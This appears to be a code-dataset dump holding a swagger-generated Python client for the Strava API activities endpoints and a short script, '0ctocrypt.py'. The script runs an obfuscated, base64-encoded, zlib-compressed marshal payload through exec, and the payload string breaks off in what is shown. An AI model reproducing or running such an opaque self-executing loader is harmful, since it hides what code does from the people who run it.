] | null | null | null |
strava/swagger_client/api/activities_api.py
|
neozenith/strava-gsheet-python
|
cce24721d6dcae69638c99261308f3d76512a087
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Strava API v3
The [Swagger Playground](https://developers.strava.com/playground) is the easiest way to familiarize yourself with the Strava API by submitting HTTP requests and observing the responses before you write any client code. It will show what a response will look like with different endpoints depending on the authorization scope you receive from your athletes. To use the Playground, go to https://www.strava.com/settings/api and change your “Authorization Callback Domain” to developers.strava.com. Please note, we only support Swagger 2.0. There is a known issue where you can only select one scope at a time. For more information, please check the section “client code” at https://developers.strava.com/docs. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class ActivitiesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_activity(self, name, type, start_date_local, elapsed_time, description, distance, trainer, commute, **kwargs): # noqa: E501
"""Create an Activity # noqa: E501
Creates a manual activity for an athlete, requires activity:write scope. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_activity(name, type, start_date_local, elapsed_time, description, distance, trainer, commute, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str type: (required)
:param datetime start_date_local: (required)
:param int elapsed_time: (required)
:param str description: (required)
:param float distance: (required)
:param int trainer: (required)
:param int commute: (required)
:return: DetailedActivity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_activity_with_http_info(name, type, start_date_local, elapsed_time, description, distance, trainer, commute, **kwargs) # noqa: E501
else:
(data) = self.create_activity_with_http_info(name, type, start_date_local, elapsed_time, description, distance, trainer, commute, **kwargs) # noqa: E501
return data
def create_activity_with_http_info(self, name, type, start_date_local, elapsed_time, description, distance, trainer, commute, **kwargs): # noqa: E501
"""Create an Activity # noqa: E501
Creates a manual activity for an athlete, requires activity:write scope. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_activity_with_http_info(name, type, start_date_local, elapsed_time, description, distance, trainer, commute, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str type: (required)
:param datetime start_date_local: (required)
:param int elapsed_time: (required)
:param str description: (required)
:param float distance: (required)
:param int trainer: (required)
:param int commute: (required)
:return: DetailedActivity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'type', 'start_date_local', 'elapsed_time', 'description', 'distance', 'trainer', 'commute'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_activity" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `create_activity`") # noqa: E501
# verify the required parameter 'type' is set
if ('type' not in params or
params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `create_activity`") # noqa: E501
# verify the required parameter 'start_date_local' is set
if ('start_date_local' not in params or
params['start_date_local'] is None):
raise ValueError("Missing the required parameter `start_date_local` when calling `create_activity`") # noqa: E501
# verify the required parameter 'elapsed_time' is set
if ('elapsed_time' not in params or
params['elapsed_time'] is None):
raise ValueError("Missing the required parameter `elapsed_time` when calling `create_activity`") # noqa: E501
# verify the required parameter 'description' is set
if ('description' not in params or
params['description'] is None):
raise ValueError("Missing the required parameter `description` when calling `create_activity`") # noqa: E501
# verify the required parameter 'distance' is set
if ('distance' not in params or
params['distance'] is None):
raise ValueError("Missing the required parameter `distance` when calling `create_activity`") # noqa: E501
# verify the required parameter 'trainer' is set
if ('trainer' not in params or
params['trainer'] is None):
raise ValueError("Missing the required parameter `trainer` when calling `create_activity`") # noqa: E501
# verify the required parameter 'commute' is set
if ('commute' not in params or
params['commute'] is None):
raise ValueError("Missing the required parameter `commute` when calling `create_activity`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'name' in params:
form_params.append(('name', params['name'])) # noqa: E501
if 'type' in params:
form_params.append(('type', params['type'])) # noqa: E501
if 'start_date_local' in params:
form_params.append(('start_date_local', params['start_date_local'])) # noqa: E501
if 'elapsed_time' in params:
form_params.append(('elapsed_time', params['elapsed_time'])) # noqa: E501
if 'description' in params:
form_params.append(('description', params['description'])) # noqa: E501
if 'distance' in params:
form_params.append(('distance', params['distance'])) # noqa: E501
if 'trainer' in params:
form_params.append(('trainer', params['trainer'])) # noqa: E501
if 'commute' in params:
form_params.append(('commute', params['commute'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/activities', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DetailedActivity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_activity_by_id(self, id, **kwargs): # noqa: E501
"""Get Activity # noqa: E501
Returns the given activity that is owned by the authenticated athlete. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_activity_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param bool include_all_efforts: To include all segments efforts.
:return: DetailedActivity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_activity_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_activity_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_activity_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Activity # noqa: E501
Returns the given activity that is owned by the authenticated athlete. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_activity_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param bool include_all_efforts: To include all segments efforts.
:return: DetailedActivity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'include_all_efforts'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_activity_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_activity_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'include_all_efforts' in params:
query_params.append(('include_all_efforts', params['include_all_efforts'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/activities/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DetailedActivity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_comments_by_activity_id(self, id, **kwargs): # noqa: E501
"""List Activity Comments # noqa: E501
Returns the comments on the given activity. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comments_by_activity_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param int page: Page number. Defaults to 1.
:param int per_page: Number of items per page. Defaults to 30.
:return: list[Comment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_comments_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_comments_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_comments_by_activity_id_with_http_info(self, id, **kwargs): # noqa: E501
"""List Activity Comments # noqa: E501
Returns the comments on the given activity. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comments_by_activity_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param int page: Page number. Defaults to 1.
:param int per_page: Number of items per page. Defaults to 30.
:return: list[Comment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'per_page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_comments_by_activity_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_comments_by_activity_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/activities/{id}/comments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Comment]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_kudoers_by_activity_id(self, id, **kwargs): # noqa: E501
"""List Activity Kudoers # noqa: E501
Returns the athletes who kudoed an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_kudoers_by_activity_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param int page: Page number. Defaults to 1.
:param int per_page: Number of items per page. Defaults to 30.
:return: list[SummaryAthlete]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_kudoers_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_kudoers_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_kudoers_by_activity_id_with_http_info(self, id, **kwargs): # noqa: E501
"""List Activity Kudoers # noqa: E501
Returns the athletes who kudoed an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_kudoers_by_activity_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param int page: Page number. Defaults to 1.
:param int per_page: Number of items per page. Defaults to 30.
:return: list[SummaryAthlete]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page', 'per_page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_kudoers_by_activity_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_kudoers_by_activity_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/activities/{id}/kudos', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SummaryAthlete]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_laps_by_activity_id(self, id, **kwargs): # noqa: E501
"""List Activity Laps # noqa: E501
Returns the laps of an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_laps_by_activity_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:return: list[Lap]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_laps_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_laps_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_laps_by_activity_id_with_http_info(self, id, **kwargs): # noqa: E501
"""List Activity Laps # noqa: E501
Returns the laps of an activity identified by an identifier. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_laps_by_activity_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:return: list[Lap]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_laps_by_activity_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_laps_by_activity_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/activities/{id}/laps', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Lap]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_logged_in_athlete_activities(self, **kwargs): # noqa: E501
"""List Athlete Activities # noqa: E501
Returns the activities of an athlete for a specific identifier. Requires activity:read. Only Me activities will be filtered out unless requested by a token with activity:read_all. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logged_in_athlete_activities(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int before: An epoch timestamp to use for filtering activities that have taken place before a certain time.
:param int after: An epoch timestamp to use for filtering activities that have taken place after a certain time.
:param int page: Page number. Defaults to 1.
:param int per_page: Number of items per page. Defaults to 30.
:return: list[SummaryActivity]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_logged_in_athlete_activities_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_logged_in_athlete_activities_with_http_info(**kwargs) # noqa: E501
return data
def get_logged_in_athlete_activities_with_http_info(self, **kwargs): # noqa: E501
"""List Athlete Activities # noqa: E501
Returns the activities of an athlete for a specific identifier. Requires activity:read. Only Me activities will be filtered out unless requested by a token with activity:read_all. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logged_in_athlete_activities_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int before: An epoch timestamp to use for filtering activities that have taken place before a certain time.
:param int after: An epoch timestamp to use for filtering activities that have taken place after a certain time.
:param int page: Page number. Defaults to 1.
:param int per_page: Number of items per page. Defaults to 30.
:return: list[SummaryActivity]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['before', 'after', 'page', 'per_page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_logged_in_athlete_activities" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'before' in params:
query_params.append(('before', params['before'])) # noqa: E501
if 'after' in params:
query_params.append(('after', params['after'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/athlete/activities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[SummaryActivity]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_zones_by_activity_id(self, id, **kwargs): # noqa: E501
"""Get Activity Zones # noqa: E501
Summit Feature. Returns the zones of a given activity. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_zones_by_activity_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:return: list[ActivityZone]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_zones_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_zones_by_activity_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_zones_by_activity_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Activity Zones # noqa: E501
Summit Feature. Returns the zones of a given activity. Requires activity:read for Everyone and Followers activities. Requires activity:read_all for Only Me activities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_zones_by_activity_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:return: list[ActivityZone]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_zones_by_activity_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_zones_by_activity_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/activities/{id}/zones', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ActivityZone]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_activity_by_id(self, id, **kwargs): # noqa: E501
"""Update Activity # noqa: E501
Updates the given activity that is owned by the authenticated athlete. Requires activity:write. Also requires activity:read_all in order to update Only Me activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_activity_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param UpdatableActivity body:
:return: DetailedActivity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_activity_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_activity_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def update_activity_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Update Activity # noqa: E501
Updates the given activity that is owned by the authenticated athlete. Requires activity:write. Also requires activity:read_all in order to update Only Me activities # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_activity_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the activity. (required)
:param UpdatableActivity body:
:return: DetailedActivity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_activity_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `update_activity_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['strava_oauth'] # noqa: E501
return self.api_client.call_api(
'/activities/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DetailedActivity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.901124
| 726
| 0.625358
| 4,704
| 39,072
| 4.973002
| 0.057185
| 0.047194
| 0.019151
| 0.024623
| 0.920104
| 0.895311
| 0.886932
| 0.881247
| 0.860044
| 0.858077
| 0
| 0.015913
| 0.285882
| 39,072
| 889
| 727
| 43.950506
| 0.822486
| 0.382038
| 0
| 0.728601
| 0
| 0
| 0.195946
| 0.041577
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035491
| false
| 0
| 0.008351
| 0
| 0.096033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86a6e8cb25a4f235668ab4cdbca6daf1cafd3d79
| 3,844
|
py
|
Python
|
0ctocrypt.py
|
Matrix-jailer/0ctocrypt
|
4d2d280449f70ccb4ef2cb3749072b3ab06b658f
|
[
"MIT"
] | 2
|
2020-07-20T18:13:58.000Z
|
2020-07-22T05:48:22.000Z
|
0ctocrypt.py
|
Matrix-jailer/0ctocrypt
|
4d2d280449f70ccb4ef2cb3749072b3ab06b658f
|
[
"MIT"
] | null | null | null |
0ctocrypt.py
|
Matrix-jailer/0ctocrypt
|
4d2d280449f70ccb4ef2cb3749072b3ab06b658f
|
[
"MIT"
] | null | null | null |
#Compiled By [ Matrix Society ]
#Github : https://github.com/Matrix-jailer
#Email : Matrixjailer@gmail.com
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("eJztWc1zE8kV79GnNbb8CbaBBQY7QXLZluUPPkyAZWGXj0qEVFoWsLwue6RubAlJIzQjwERWUUUOOWylSMWwWRYqlb3kltpDKlXZS6o2f0a4xNe95LD3pN/raWlky4Bhl70wkntef7zX7/de63W/dobYj4v/neF/5jcKIZSQ3xCS4oRCqIvkFZJSJO0iKZek3STllrSHpDyS9pKUV9I+kvIR6kaBfsK8JNdGqIc8UIjC/OQBIQr1YmeAUJ+c1o+ESpgqRrSRVDu5+yVh7YTTN12kPK00iwqIgQFy4SLrIFSF1lSQsCCh7chwYBMDn6WjTgXqVLBFmxhHO0GJW19IDF2itZvPyBuv0R6pfC8SnYT2kVQXobtIqpvQ3STVQ2g/SfW2tAHrFPoPcGl0EIo9UOyFYh8U70GxHyX3EbaL0AOI6u8K60POIgFrfxw+yH2YUWyHuvnfOXAqFHdPkip6dODDhShZU4hFSE4hORepKqiKXXejPMtDcl4QCT232jk+wqWDwMsmiFeXf73rrxf+c896P+zjVQt6zFXTgoppUaNiWV5O3ilnLYbUjXzFXOFS+dhsQTSZecZKYVDUApH3sGRhWI5YmNBFl1FmTLfK2bt+aG2DPqVH6VaCSvZ//Lmcca5iBNwJQhEtOgl0d6Huj7kG++YnfzE9WVBVVcNnUWv5LIpnm07gXaSxWCwd2TQkotO4fNJ6ZBPfGPIAO02ENK02x2vOAQ1eW4KzU4/FEjVNW5pLc/6roq025BSwmb1JAI0N1QR1VXVIXeIYtmVvCOCah5xsXA0bfLUFVzxeteEm6ly2MTlfLFbV4olQbWjOwZAYqi3NxbUq7wXTIIOKzpoqSA1iUtdaLaTF47Y8wS54eONSreYcr6IewnCxtG67qw5sifOG6vBtTXWhQ22OI1S1k3WNlsBhKIJPavDXGZAUx7dmcCWQmYOuhepGip1uMpttgNinMLFh6yLmNUCViRgawOYZ0+0ltCSWCjBxncao4x2iscaEyCHMNlOwrTAHuB3rdGmLs0L1Pm4rXXCA4bQxgRxUbojYwu5krTMgvzScJta6EIIOS1yFR5CSVaxvaSTgn2v6edQalotfWoLnklB/ookXfRlLoAkdq7tu+zQIuDQGD/KDAR2Kak2LfcnZ3jBg+jI8tMl0jf6Q2qK10V1DrWshjEHgq2ghDNEv2SaD39YwCLEzbywb/dDmwXDnHsRAmskzvVwPgooMggGCEZBvHO/in+h8F//exT8Jufl5F/9+8vhHtg99cO7LFk2IfsdkM9n7ds65T76A5x/inJuEiZMYqWHiJAxMQixOQhzGGJvEcf5WODC6pzafYTPy5OqXMB7JwG0RqRrPoNY4tgQclUXq8OHCWUTnAig8h0JoiCbng6SHG4ED5qbjBO/r3zPgGNGG4G8NcbxynjYhQYgTyY8VIDnVTqbEIboDDQPKaqoZIfW95NwKy9zMFpe1DyrWCita2YxuZY2iZkevX7LVSCTCWcBK1YnxT7UsF0fqtkVTB02Vl78ydMoF8eHmaEP+eT2bZ1SzDC3JeCJwm+FEUvxNFJ9F64MMsx3ENSSF2+XWittlWS8us4bXNvkUU5k8K6JvLWgx7LSGpzesIPIV2Fr1YraAKDFvybZetXmhhA7N/ehor6IqPlcfd/yQ0oO1oCLyonKFSdOekdCPFeZtkKN2fUFL8O3eZFqibNzO0mZLcEPb1GnN0riQ4yxNJ6eP06PH6exUNJqZSs/OTmWOsOkj+rGoPjVr7pczTRXGWz7mUGOEdo3lM0aBgSNERqZ9bGSyzFrVRJKn501mzsGvkC6PGyVW1FYsq2SemJjQS9nInRXdMvVSKcJlTJisSN8vrRhFdmp2anpyOjo1eSQ6Gz1ssbvWqcOmUSln2KnDVLf0U4c5z6Ke5hzWKQuM+BNkuD/AL/+3LX/5WCcvOLKd5FOpYkM7UthY/2xj/b7zq23c/2rj6V/ge/8rbVPnxvpDDLhvja1+XhkH/tgHV5KXrgM1bkd+eEfPXYlnyqsly9l8vpK5WV9M4w246ztT4I+23m+JTZV4Nx6t